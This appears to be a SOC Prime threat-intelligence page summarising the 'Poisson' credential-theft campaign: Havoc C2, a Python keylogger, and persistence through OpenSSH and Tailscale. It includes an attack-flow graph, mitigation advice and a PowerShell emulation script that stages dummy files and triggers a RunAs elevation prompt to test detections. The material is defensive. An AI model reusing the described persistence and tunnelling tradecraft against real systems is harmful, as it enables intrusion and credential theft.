SOC Prime Bias: High

17 Jun 2026 13:03 UTC
newspaper icon Cato Networks

Operation Poisson: Breaking Down an Entire Cybercriminal Operation

Author Photo
SOC Prime Team linkedin icon Follow
Operation Poisson: Breaking Down an Entire Cybercriminal Operation
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

A low-skilled threat actor known as “Poisson” carried out a multi-stage credential theft campaign aimed at French individuals and a small business. The attacker used Havoc C2, a custom Python keylogger, and built resilient access through OpenSSH and a Tailscale VPN mesh. This setup allowed the operator to retain access even after the main command-and-control infrastructure was disrupted.

Investigation

Cato CTRL conducted an in-depth post-incident review covering 33 days of attacker activity and 339 recorded commands. The investigation revealed use of free-tier services such as Backblaze B2, DuckDNS, and IONOS, along with a persistence design intended to survive C2 takedowns. Researchers also recovered the operator’s SSH playbook and victim SSH keys, which had been mistakenly exposed in a public storage bucket.

Mitigation

Defenders should generate alerts for OpenSSH server deployment on workstations and monitor for Tailscale VPN activity on systems where it is not expected. Organizations also need to detect SSH reverse tunnels and track suspicious scheduled tasks running with elevated privileges. Effective remediation must go beyond removing C2 access and include elimination of mesh-VPN-based persistence mechanisms.

Response

When this activity is identified, security teams should immediately locate and dismantle any active Tailscale or SSH mesh connections. Investigators should review all scheduled tasks and startup shortcuts for unauthorized persistence. A full credential reset is strongly recommended for all users, since the use of a keylogger creates a high likelihood of credential compromise.

"graph TB %% Class Definitions Section classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef persistence fill:#99ff99 classDef command_control fill:#ffcc99 %% Initial Execution and Payload Delivery action_stager_exec["<b>Action</b> – <b>T1216.002 PowerShell: Command and Scripting Interpreter</b><br/>User executes VBScript stager sys.vbs to trigger System Script Proxy Execution.<br/><b>File</b>: sys.vbs"] class action_stager_exec action malware_powershell_payload["<b>Malware</b> – <b>T1216.002 PowerShell</b><br/>Decrypted PowerShell payload used to download the primary malware.<br/><b>Type</b>: Stager/Downloader"] class malware_powershell_payload malware action_download_primary["<b>Action</b> – <b>T1105 Ingress Tool Transfer</b><br/>Downloading the primary malware implant via PowerShell."] class action_download_primary action %% Obfuscation and Loading malware_senti_dll["<b>Malware</b> – <b>Name</b>: senti.dll<br/><b>Techniques</b>: T1027.009 Embedded Payloads and T1027.015 Compression<br/>Uses five-layer matryoshka encoding to hide shellcode within English words in a .NET DLL.<br/><b>Goal</b>: Fileless execution"] class malware_senti_dll malware %% Privilege Escalation and Persistence action_uac_bypass["<b>Action</b> – <b>T1204 User Execution</b><br/>Attempted privilege escalation using Start-Process -Verb RunAs to trigger UAC prompts."] class action_uac_bypass action persist_task_admin["<b>Persistence</b> – <b>T1053 Scheduled Task/Job</b><br/>Created TaskAdmin1 to run the stager with highest privileges at logon."] class persist_task_admin persistence persist_startup_lnk["<b>Persistence</b> – <b>T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</b><br/>Placed startup shortcut sys.lnk in the Startup folder."] class persist_startup_lnk persistence %% Credential Theft tool_keylogger["<b>Tool</b> – <b>Name</b>: KeyL.zip<br/><b>Technique</b>: T1056.001 Input Capture: Keylogging<br/>Custom 70-line Python keylogger to harvest banking and email credentials."] class tool_keylogger tool %% Command and Control c2_havoc["<b>Command and Control</b> – <b>Name</b>: Havoc Framework<br/>Primary C2 management framework."] class c2_havoc command_control tool_rustdesk["<b>Tool</b> – <b>T1219 Remote Access Software</b><br/>Custom-compiled RustDesk installed for redundancy."] class tool_rustdesk tool %% Resilient Persistence persist_ssh_tailscale["<b>Persistence</b> – <b>T1668 Exclusive Control</b><br/>Installed OpenSSH Server and joined Tailscale VPN mesh to survive C2 takedown."] class persist_ssh_tailscale persistence action_ssh_tunnel["<b>Action</b> – <b>T1219.001 IDE Tunneling and T1572 Protocol Tunneling</b><br/>Used SSH reverse tunnel ssh -R to maintain direct encrypted access."] class action_ssh_tunnel action %% Connection Flow action_stager_exec –>|executes| malware_powershell_payload malware_powershell_payload –>|downloads| action_download_primary action_download_primary –>|loads| malware_senti_dll malware_senti_dll –>|triggers| action_uac_bypass action_uac_bypass –>|establishes| persist_task_admin action_uac_bypass –>|establishes| persist_startup_lnk malware_senti_dll –>|deploys| tool_keylogger malware_senti_dll –>|communicates with| c2_havoc c2_havoc –>|deploys redundant| tool_rustdesk tool_rustdesk –>|leads to| persist_ssh_tailscale persist_ssh_tailscale –>|uses| action_ssh_tunnel "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands: The adversary, simulating the “Poisson” group, aims to establish a remote access foothold. First, they stage a payload by creating a file named thales.zip in a temporary directory. To elevate privileges, they execute a PowerShell command using the RunAs verb, which is a common method for triggering UAC prompts. Finally, they execute rustdesk.exe to provide a secondary remote desktop communication channel. This sequence mimics the specific behavioral pattern (UAC elevation + RustDesk + specific zip file) defined in the detection rule.

  • Regression Test Script:

    # Simulation Script: Poisson TTP Emulation

# 1. Stage the 'thales.zip' file (required by detection logic)
$targetZip = "$env:TEMPthales.zip"
New-Item -Path $targetZip -ItemType File -Force
Write-Host "[+] Staged $targetZip"

# 2. Simulate UAC Elevation attempt via PowerShell (required by detection logic)
# Note: This will trigger a UAC prompt in a real environment.
Write-Host "[+] Attempting UAC Elevation via Start-Process -Verb RunAs..."
Start-Process powershell.exe -ArgumentList "-Command Write-Host 'Elevation Attempted'" -Verb RunAs

# 3. Simulate execution of RustDesk (required by detection logic)
# We will create a dummy rustdesk.exe in the temp folder to trigger the detection without real installation
$rustdeskPath = "$env:TEMPrustdesk.exe"
New-Item -Path $rustdeskPath -ItemType File -Force
Write-Host "[+] Executing simulated RustDesk at $rustdeskPath"
Start-Process $rustdeskPath

  • Cleanup Commands:

    # Cleanup Simulation Artifacts
Remove-Item -Path "$env:TEMPthales.zip" -Force -ErrorAction SilentlyContinue
Remove-Item -Path "$env:TEMPrustdesk.exe" -Force -ErrorAction SilentlyContinue
Write-Host "[+] Cleanup complete."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free